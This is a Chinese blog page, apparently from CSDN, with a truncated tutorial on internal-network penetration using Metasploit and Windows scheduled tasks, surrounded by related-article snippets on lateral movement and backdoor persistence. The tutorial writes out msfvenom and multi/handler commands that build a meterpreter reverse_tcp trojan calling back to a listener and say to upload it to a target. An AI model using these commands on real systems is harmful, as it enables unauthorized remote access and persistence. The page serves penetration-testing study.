内网渗透(MSF和计划任务)

最新推荐文章于 2024-04-06 07:06:23 发布
VIP文章 最新推荐文章于 2024-04-06 07:06:23 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42383069/article/details/122156188
版权

MSF+计划任务

1. MSF

** 1)启动:msfconsole
** 2)侦听模式:use exploit/multi/handler
在这里插入图片描述
** 3)生成exe文件:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.215 LPORT=6666 -f exe >/home/kali/Desktop/1.exe
在这里插入图片描述
** 4)本机设置(payload、HOST、PORT)
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.215
set LPORT 6666
run
在这里插入图片描述
** 5)将生成的木马文件上传到服务器,启动:
可以在资源

最低0.47元/天 解锁文章
Beyond My
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透(三十四)之横向移动篇-IPC配合计划任务横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-16 243
IPC( Internet ProcessConnection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算 机的共享资源时使用。通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。首先,需要建立一个ipc$
横向远程命令执行——Windows计划任务
SheXinK’s Blog
12-29 2135
横向远程命令执行——at、schtasks计划任务1、 测试环境2、 计划任务利用2.1 at2.2 schtasks   Windows任务计划程序可以让计算机按照我们的要求在指定时间执行指定的程序,并且可以设置时间间隔重复执行。利用“任务计划”,可以将任何脚本、程序或文档安排在某个最方便的时间运行。 1、 测试环境   Win7:192.168.11.137   Server2008:192....
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
kali 渗透msf
11-14
kali渗透测试利器
内网MSF11111
01-05
一些关于内网的资料,自己搜集的,分享给大家
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
msf内网渗透
10-29
msf内网渗透
Linux计划任务执行msf木马,Metasploit生成木马文件获取shell和UAC提权操作
weixin_42297349的博客
05-16 872
前言攻击环境获取shellUAC提权一. 前言前段时间有做过一次内核提权的尝试,不过没有成功,主要还是权限控制的比较严格,并且该打的补丁都打了。但是方法还是有用的,还有就是思路流程总结一下。二. 攻击环境攻击机:kali Linux 2019.1 IP:192.168.28.156靶机:Windows7 ultimate sp1 IP:192.168.28.138三. 获取shell3.1 生成木...
内网安全之横向移动(冰蝎&&msf&&IPC$)
hack0919的博客
04-21 831
冰蝎相较其它Webshell管理工具,具备如下优点:支持跨平台运行、多采用加密传输、版本更新频繁等。
【内网安全】——Windows提权姿势
Demo不是emo的博客
02-06 5064
超详细的windows提权姿势汇总
Windows留后门--教程(二)——Windows计划任务后门
W小哥
03-15 4302
一、Windows计划任务后门介绍 计划任务是经常被攻击者拿来利用的控制点,计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持。 二、Windows计划任务后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 环境: windows Server2012 IP: 192.168.226.128 2.1 利用MSF生成一个EXE类型的后门木马 2.2 创建计划任务 2.3 监听返回的shell 三、Win
关闭User_Feed_Synchronization任务计划程序msf
zzy7075的专栏
06-03 2万+
关闭User_Feed_Synchronization任务计划程序msf 在任务计划程序中,有时会看到User_Feed_Synchronization这个任务。虽然执行频率不高,但老是偷偷执行让人不爽。查了下百度百科,执行的是msfeedssync.exe服务。以下是百科解析: msfeedssync是微软IE7的RSS(被称作“源”)更新程序。当更新订阅的RSS
window下的计划任务
weixin_30314813的博客
03-04 298
0x00前言: 这几天看了看信息安全就业的面试题,其中有一条是计划任务如何设置,好几个月前稍微接触了,但是很久没用差不多都忘了>_<,这里就稍微学习下windows的计划任务 写着写着就偏离了正题,稍微有点像自己的练习记录了,其中除了计划任务也穿插了一些msf的知识 0x01场景设置: 因为直接在windows是敲几个命令太无聊了,于是这里我用msf模块的永恒之蓝漏洞进行远程操...
MSF-Linux系统攻防
最新发布
h1008685的博客
04-06 951
使用msf对linux服务器ssh协议解析爆破,防止ssh暴力破解解决方案,持久性后门建立,创建计划任务,scp传输文件报错解决
winodws计划任务
cxk
06-27 176
权限维持-windows计划任务 目录 0x00 靶机 0x01 实战 0x02 问题 0X00 靶机 windows 2K3 IP 192.168.5.187 账户密码 administrator 123456 0x01实战 A 1)本机win+r打开远程桌面连接,输入靶机地址192.168.5.187,并输入账户密码登录 2)点击右下角的开始-控制面板-任务计划 3)任务计划向导,下一步...
内网渗透之——常规渗透方式及思路(端口扫描、 弱口令扫描、ms17_010利用、hash注入、远程连接&执行程序......)
wsnbbz的博客
03-25 5666
端口扫描 常见端口以及攻击方式 具体扫描方法点此跳转我的另一文章,里面详细介绍了端口扫描工具的使用 弱口令扫描 弱口令扫描,例如对于mysql,vnc,rdp,http管理登录等弱口令进入的服务,可以使用一些弱口令扫描工具,xscan,hydra,medusa,nmap等。也可以自己找到更多更好的工具 hydra 1.先用nmap扫描开发了哪些端口 2.使用hydra对可以进行弱...
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
MSF使用教程
huangyongkang666的博客
03-26 9397
MSF使用教程 1.简介 ​ Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 2.MSF模块介绍 1.辅助模块 auxiliary 负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能 2.渗透攻击模块exploits 利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) ​ 主动渗透攻击:发送网络数据,触发安全漏洞。比如web应用程序渗透攻击、SCADA工业控制系
Msfconsole的基本使用
m0_46373658的博客
09-13 6846
WIN XP ms12_020 复现 msfconsole search 查找模块 use 装载模块 winxp ip :192.168.186.133 set RHOST 设置目标主机 run 执行攻击 目标蓝屏死机 重启 常用命令 show exploits 列出metasploit框架中的所有渗透攻击模块 show payloads 列出metasploit框架中的所有攻击载荷 show auxiliary 列出metasploit框架中的所有辅助攻击载荷 sea
msf和frp内网穿透
08-19
虽然msf主要是用于渗透测试和漏洞利用,但它也可以通过反向连接来实现内网穿透。你可以在目标机器上执行一个反向Shell并将其连接到外部控制台,从而实现对内网设备的访问。 Frp是一个高性能的反向代理工具,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值